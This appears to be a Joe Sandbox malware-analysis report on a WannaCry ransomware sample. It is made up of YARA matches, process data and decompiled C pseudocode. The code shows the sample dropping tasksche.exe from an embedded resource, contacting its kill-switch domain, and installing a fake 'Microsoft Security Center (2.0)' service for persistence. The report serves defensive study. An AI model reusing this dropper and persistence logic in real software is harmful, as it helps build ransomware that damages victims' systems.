                                                        File size:3514368 bytes
                                                        MD5 hash:7F7CCAA16FB15EB1C7399D422F8363E8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000A.00000000.313432129.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000A.00000002.315696663.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: us-cert code analysis team

                                                        Target ID:14
                                                        Start time:10:06:04
                                                        Start date:22/12/2022
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff6ffff0000
                                                        File size:51288 bytes
                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:71.8%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:64.9%
                                                          Total number of Nodes:37
                                                          Total number of Limit Nodes:9

                                                          Callgraph

                                                          Control-flow Graph

                                                          C-Code - Quality: 86%
                                                          			E00407CE0() {
                                                          				void _v259;
                                                          				char _v260;
                                                          				void _v519;
                                                          				char _v520;
                                                          				struct _STARTUPINFOA _v588;
                                                          				struct _PROCESS_INFORMATION _v604;
                                                          				long _v608;
                                                          				_Unknown_base(*)()* _t36;
                                                          				void* _t38;
                                                          				void* _t39;
                                                          				void* _t50;
                                                          				int _t59;
                                                          				struct HINSTANCE__* _t104;
                                                          				struct HRSRC__* _t105;
                                                          				void* _t107;
                                                          				void* _t108;
                                                          				long _t109;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t122;
                                                          
                                                          				_t104 = GetModuleHandleW(L"kernel32.dll");
                                                          				if(_t104 != 0) {
                                                          					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                                                          					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                                                          					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                                                          					_t36 = GetProcAddress(_t104, "CloseHandle");
                                                          					 *0x43144c = _t36;
                                                          					if( *0x431478 != 0) {
                                                          						_t121 =  *0x431458; // 0x766df7b0
                                                          						if(_t121 != 0) {
                                                          							_t122 =  *0x431460; // 0x766dfc30
                                                          							if(_t122 != 0 && _t36 != 0) {
                                                          								_t105 = FindResourceA(0, 0x727, "R");
                                                          								if(_t105 != 0) {
                                                          									_t38 = LoadResource(0, _t105);
                                                          									if(_t38 != 0) {
                                                          										_t39 = LockResource(_t38);
                                                          										_v608 = _t39;
                                                          										if(_t39 != 0) {
                                                          											_t109 = SizeofResource(0, _t105);
                                                          											if(_t109 != 0) {
                                                          												_v520 = 0;
                                                          												memset( &_v519, 0, 0x40 << 2);
                                                          												asm("stosw");
                                                          												asm("stosb");
                                                          												_v260 = 0;
                                                          												memset( &_v259, 0, 0x40 << 2);
                                                          												asm("stosw");
                                                          												asm("stosb");
                                                          												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                                                          												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                                                          												MoveFileExA( &_v520,  &_v260, 1); // executed
                                                          												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
                                                          												_t107 = _t50;
                                                          												if(_t107 != 0xffffffff) {
                                                          													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
                                                          													FindCloseChangeNotification(_t107); // executed
                                                          													_v604.hThread = 0;
                                                          													_v604.dwProcessId = 0;
                                                          													_v604.dwThreadId = 0;
                                                          													memset( &(_v588.lpReserved), 0, 0x10 << 2);
                                                          													asm("repne scasb");
                                                          													_v604.hProcess = 0;
                                                          													_t108 = " /i";
                                                          													asm("repne scasb");
                                                          													memcpy( &_v520 - 1, _t108, 0 << 2);
                                                          													memcpy(_t108 + 0x175b75a, _t108, 0);
                                                          													_v588.cb = 0x44;
                                                          													_v588.wShowWindow = 0;
                                                          													_v588.dwFlags = 0x81;
                                                          													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
                                                          													if(_t59 != 0) {
                                                          														CloseHandle(_v604.hThread);
                                                          														CloseHandle(_v604);
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}






















                                                          0x00407cf5
                                                          0x00407cfb
                                                          0x00407d15
                                                          0x00407d22
                                                          0x00407d2f
                                                          0x00407d34
                                                          0x00407d3c
                                                          0x00407d43
                                                          0x00407d49
                                                          0x00407d4f
                                                          0x00407d55
                                                          0x00407d5b
                                                          0x00407d7a
                                                          0x00407d7e
                                                          0x00407d86
                                                          0x00407d8e
                                                          0x00407d95
                                                          0x00407d9d
                                                          0x00407da1
                                                          0x00407daf
                                                          0x00407db3
                                                          0x00407dc4
                                                          0x00407dc8
                                                          0x00407dca
                                                          0x00407dcc
                                                          0x00407ddb
                                                          0x00407de2
                                                          0x00407def
                                                          0x00407df1
                                                          0x00407e01
                                                          0x00407e18
                                                          0x00407e2c
                                                          0x00407e43
                                                          0x00407e49
                                                          0x00407e4e
                                                          0x00407e61
                                                          0x00407e68
                                                          0x00407e72
                                                          0x00407e7a
                                                          0x00407e82
                                                          0x00407e8b
                                                          0x00407e95
                                                          0x00407e9b
                                                          0x00407e9f
                                                          0x00407ea8
                                                          0x00407eb0
                                                          0x00407ebc
                                                          0x00407ed3
                                                          0x00407edb
                                                          0x00407ee0
                                                          0x00407ee8
                                                          0x00407ef0
                                                          0x00407ef7
                                                          0x00407f02
                                                          0x00407f02
                                                          0x00407ef0
                                                          0x00407e4e
                                                          0x00407db3
                                                          0x00407da1
                                                          0x00407d8e
                                                          0x00407d7e
                                                          0x00407d5b
                                                          0x00407d4f
                                                          0x00407d43
                                                          0x00407f14

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F52FB10,?,00000000), ref: 00407CEF
                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                          • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                          • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                          • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                          • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                          • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                          • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                          • sprintf.MSVCRT ref: 00407E01
                                                          • sprintf.MSVCRT ref: 00407E18
                                                          • MoveFileExA.KERNEL32 ref: 00407E2C
                                                          • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                                                          • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                                                          • CreateProcessA.KERNELBASE ref: 00407EE8
                                                          • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                                                          • CloseHandle.KERNEL32(08000000), ref: 00407F02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.313692212.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000005.00000002.313687116.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313767798.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313778365.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313837823.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313898949.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                                                          • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                          • API String ID: 1541710770-1507730452
                                                          • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                          • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                          • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                          • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 71%
                                                          			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                          				CHAR* _v8;
                                                          				intOrPtr* _v24;
                                                          				intOrPtr _v28;
                                                          				struct _STARTUPINFOA _v96;
                                                          				int _v100;
                                                          				char** _v104;
                                                          				int _v108;
                                                          				void _v112;
                                                          				char** _v116;
                                                          				intOrPtr* _v120;
                                                          				intOrPtr _v124;
                                                          				void* _t27;
                                                          				intOrPtr _t36;
                                                          				signed int _t38;
                                                          				int _t40;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t49;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t61;
                                                          
                                                          				_push(0xffffffff);
                                                          				_push(0x40a1a0);
                                                          				_push(0x409ba2);
                                                          				_push( *[fs:0x0]);
                                                          				 *[fs:0x0] = _t58;
                                                          				_v28 = _t58 - 0x68;
                                                          				_v8 = 0;
                                                          				__set_app_type(2);
                                                          				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                          				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                          				 *(__p__fmode()) =  *0x70f88c;
                                                          				 *(__p__commode()) =  *0x70f888;
                                                          				 *0x70f890 = _adjust_fdiv;
                                                          				_t27 = E00409BA1( *_adjust_fdiv);
                                                          				_t61 =  *0x431410; // 0x1
                                                          				if(_t61 == 0) {
                                                          					__setusermatherr(E00409B9E);
                                                          				}
                                                          				E00409B8C(_t27);
                                                          				_push(0x40b010);
                                                          				_push(0x40b00c);
                                                          				L00409B86();
                                                          				_v112 =  *0x70f884;
                                                          				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                          				_push(0x40b008);
                                                          				_push(0x40b000); // executed
                                                          				L00409B86(); // executed
                                                          				_t55 =  *_acmdln;
                                                          				_v120 = _t55;
                                                          				if( *_t55 != 0x22) {
                                                          					while( *_t55 > 0x20) {
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          						_t42 =  *_t55;
                                                          					} while (_t42 != 0 && _t42 != 0x22);
                                                          					if( *_t55 == 0x22) {
                                                          						L6:
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          					}
                                                          				}
                                                          				_t36 =  *_t55;
                                                          				if(_t36 != 0 && _t36 <= 0x20) {
                                                          					goto L6;
                                                          				}
                                                          				_v96.dwFlags = 0;
                                                          				GetStartupInfoA( &_v96);
                                                          				if((_v96.dwFlags & 0x00000001) == 0) {
                                                          					_t38 = 0xa;
                                                          				} else {
                                                          					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                          				}
                                                          				_push(_t38);
                                                          				_push(_t55);
                                                          				_push(0);
                                                          				_push(GetModuleHandleA(0));
                                                          				_t40 = E00408140();
                                                          				_v108 = _t40;
                                                          				exit(_t40); // executed
                                                          				_t41 = _v24;
                                                          				_t49 =  *((intOrPtr*)( *_t41));
                                                          				_v124 = _t49;
                                                          				_push(_t41);
                                                          				_push(_t49);
                                                          				L00409B80();
                                                          				return _t41;
                                                          			}
























                                                          0x00409a19
                                                          0x00409a1b
                                                          0x00409a20
                                                          0x00409a2b
                                                          0x00409a2c
                                                          0x00409a39
                                                          0x00409a3e
                                                          0x00409a43
                                                          0x00409a4a
                                                          0x00409a51
                                                          0x00409a64
                                                          0x00409a72
                                                          0x00409a7b
                                                          0x00409a80
                                                          0x00409a85
                                                          0x00409a8b
                                                          0x00409a92
                                                          0x00409a98
                                                          0x00409a99
                                                          0x00409a9e
                                                          0x00409aa3
                                                          0x00409aa8
                                                          0x00409ab2
                                                          0x00409acb
                                                          0x00409ad1
                                                          0x00409ad6
                                                          0x00409adb
                                                          0x00409ae8
                                                          0x00409aea
                                                          0x00409af0
                                                          0x00409b2c
                                                          0x00409b31
                                                          0x00409b32
                                                          0x00409b32
                                                          0x00409af2
                                                          0x00409af2
                                                          0x00409af2
                                                          0x00409af3
                                                          0x00409af6
                                                          0x00409af8
                                                          0x00409b03
                                                          0x00409b05
                                                          0x00409b05
                                                          0x00409b06
                                                          0x00409b06
                                                          0x00409b03
                                                          0x00409b09
                                                          0x00409b0d
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b13
                                                          0x00409b1a
                                                          0x00409b24
                                                          0x00409b39
                                                          0x00409b26
                                                          0x00409b26
                                                          0x00409b26
                                                          0x00409b3a
                                                          0x00409b3b
                                                          0x00409b3c
                                                          0x00409b44
                                                          0x00409b45
                                                          0x00409b4a
                                                          0x00409b4e
                                                          0x00409b54
                                                          0x00409b59
                                                          0x00409b5b
                                                          0x00409b5e
                                                          0x00409b5f
                                                          0x00409b60
                                                          0x00409b67

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.313692212.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000005.00000002.313687116.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313767798.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313778365.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313837823.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313898949.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                          • String ID:
                                                          • API String ID: 801014965-0
                                                          • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                          • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                          • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                          • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 92%
                                                          			E00408140() {
                                                          				char* _v1;
                                                          				char* _v3;
                                                          				char* _v7;
                                                          				char* _v11;
                                                          				char* _v15;
                                                          				char* _v19;
                                                          				char* _v23;
                                                          				void _v80;
                                                          				char _v100;
                                                          				char* _t12;
                                                          				void* _t13;
                                                          				void* _t27;
                                                          
                                                          				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                                                          				asm("movsb");
                                                          				_v23 = _t12;
                                                          				_v19 = _t12;
                                                          				_v15 = _t12;
                                                          				_v11 = _t12;
                                                          				_v7 = _t12;
                                                          				_v3 = _t12;
                                                          				_v1 = _t12;
                                                          				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                          				_t27 = _t13;
                                                          				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                          				InternetCloseHandle(_t27); // executed
                                                          				InternetCloseHandle(0);
                                                          				E00408090();
                                                          				return 0;
                                                          			}















                                                          0x00408155
                                                          0x00408157
                                                          0x00408158
                                                          0x0040815c
                                                          0x00408160
                                                          0x00408164
                                                          0x00408168
                                                          0x0040816c
                                                          0x00408177
                                                          0x0040817b
                                                          0x0040818e
                                                          0x00408194
                                                          0x004081a7
                                                          0x004081ab
                                                          0x004081ad
                                                          0x004081b9

                                                          APIs
                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                          • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                          • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                            • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                            • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                          Strings
                                                          • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.313692212.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000005.00000002.313687116.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313767798.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313778365.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313837823.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313898949.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                          • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                          • API String ID: 774561529-2942426231
                                                          • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                          • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                                                          • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                          • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 100%
                                                          			E00407C40() {
                                                          				char _v260;
                                                          				void* _t15;
                                                          				void* _t17;
                                                          
                                                          				sprintf( &_v260, "%s -m security", 0x70f760);
                                                          				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                                                          				if(_t15 == 0) {
                                                          					return 0;
                                                          				} else {
                                                          					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                                                          					if(_t17 != 0) {
                                                          						StartServiceA(_t17, 0, 0);
                                                          						CloseServiceHandle(_t17);
                                                          					}
                                                          					CloseServiceHandle(_t15);
                                                          					return 0;
                                                          				}
                                                          			}






                                                          0x00407c56
                                                          0x00407c6e
                                                          0x00407c72
                                                          0x00407cd3
                                                          0x00407c74
                                                          0x00407ca7
                                                          0x00407cab
                                                          0x00407cb2
                                                          0x00407cb9
                                                          0x00407cb9
                                                          0x00407cbc
                                                          0x00407cc9
                                                          0x00407cc9

                                                          APIs
                                                          • sprintf.MSVCRT ref: 00407C56
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                          • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F52FB10,00000000), ref: 00407C9B
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.313692212.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000005.00000002.313687116.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313767798.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313778365.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313837823.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313898949.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                          • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                          • API String ID: 3340711343-4063779371
                                                          • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                          • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                          • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                          • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 86%
                                                          			E00408090() {
                                                          				char* _v4;
                                                          				char* _v8;
                                                          				intOrPtr _v12;
                                                          				struct _SERVICE_TABLE_ENTRY _v16;
                                                          				long _t6;
                                                          				void* _t19;
                                                          				void* _t22;
                                                          
                                                          				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                                                          				__imp____p___argc();
                                                          				_t26 =  *_t6 - 2;
                                                          				if( *_t6 >= 2) {
                                                          					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                                                          					__eflags = _t19;
                                                          					if(_t19 != 0) {
                                                          						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
                                                          						__eflags = _t22;
                                                          						if(_t22 != 0) {
                                                          							E00407FA0(_t22, 0x3c);
                                                          							CloseServiceHandle(_t22);
                                                          						}
                                                          						CloseServiceHandle(_t19);
                                                          					}
                                                          					_v16 = "mssecsvc2.0";
                                                          					_v12 = 0x408000;
                                                          					_v8 = 0;
                                                          					_v4 = 0;
                                                          					return StartServiceCtrlDispatcherA( &_v16);
                                                          				} else {
                                                          					return E00407F20(_t26);
                                                          				}
                                                          			}










                                                          0x0040809f
                                                          0x004080a5
                                                          0x004080ab
                                                          0x004080ae
                                                          0x004080c9
                                                          0x004080cb
                                                          0x004080cd
                                                          0x004080e8
                                                          0x004080ea
                                                          0x004080ec
                                                          0x004080f1
                                                          0x004080fa
                                                          0x004080fa
                                                          0x004080fd
                                                          0x00408100
                                                          0x00408105
                                                          0x0040810e
                                                          0x00408116
                                                          0x0040811e
                                                          0x00408130
                                                          0x004080b0
                                                          0x004080b8
                                                          0x004080b8

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                          • __p___argc.MSVCRT ref: 004080A5
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                          • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F52FB10,00000000,?,004081B2), ref: 004080DC
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                          • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.313692212.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000005.00000002.313687116.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313767798.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313778365.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313837823.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313898949.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_mssecsvc.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                          • String ID: mssecsvc2.0
                                                          • API String ID: 4274534310-3729025388
                                                          • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                          • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                          • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                          • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:36.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:35
                                                          Total number of Limit Nodes:2

                                                          Callgraph

                                                          Control-flow Graph

                                                          C-Code - Quality: 86%
                                                          			E00408090() {
                                                          				char* _v4;
                                                          				char* _v8;
                                                          				intOrPtr _v12;
                                                          				struct _SERVICE_TABLE_ENTRY _v16;
                                                          				long _t6;
                                                          				int _t9;
                                                          				void* _t19;
                                                          				void* _t22;
                                                          
                                                          				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                                                          				__imp____p___argc();
                                                          				_t26 =  *_t6 - 2;
                                                          				if( *_t6 >= 2) {
                                                          					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                                                          					__eflags = _t19;
                                                          					if(_t19 != 0) {
                                                          						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
                                                          						__eflags = _t22;
                                                          						if(_t22 != 0) {
                                                          							E00407FA0(_t22, 0x3c);
                                                          							CloseServiceHandle(_t22);
                                                          						}
                                                          						CloseServiceHandle(_t19);
                                                          					}
                                                          					_v16 = "mssecsvc2.0";
                                                          					_v12 = 0x408000;
                                                          					_v8 = 0;
                                                          					_v4 = 0;
                                                          					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
                                                          					return _t9;
                                                          				} else {
                                                          					return E00407F20(_t26);
                                                          				}
                                                          			}











                                                          0x0040809f
                                                          0x004080a5
                                                          0x004080ab
                                                          0x004080ae
                                                          0x004080c9
                                                          0x004080cb
                                                          0x004080cd
                                                          0x004080e8
                                                          0x004080ea
                                                          0x004080ec
                                                          0x004080f1
                                                          0x004080fa
                                                          0x004080fa
                                                          0x004080fd
                                                          0x00408100
                                                          0x00408105
                                                          0x0040810e
                                                          0x00408116
                                                          0x0040811e
                                                          0x00408126
                                                          0x00408130
                                                          0x004080b0
                                                          0x004080b8
                                                          0x004080b8

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                          • __p___argc.MSVCRT ref: 004080A5
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                          • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F52FB10,00000000,?,004081B2), ref: 004080DC
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                          • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                          Strings
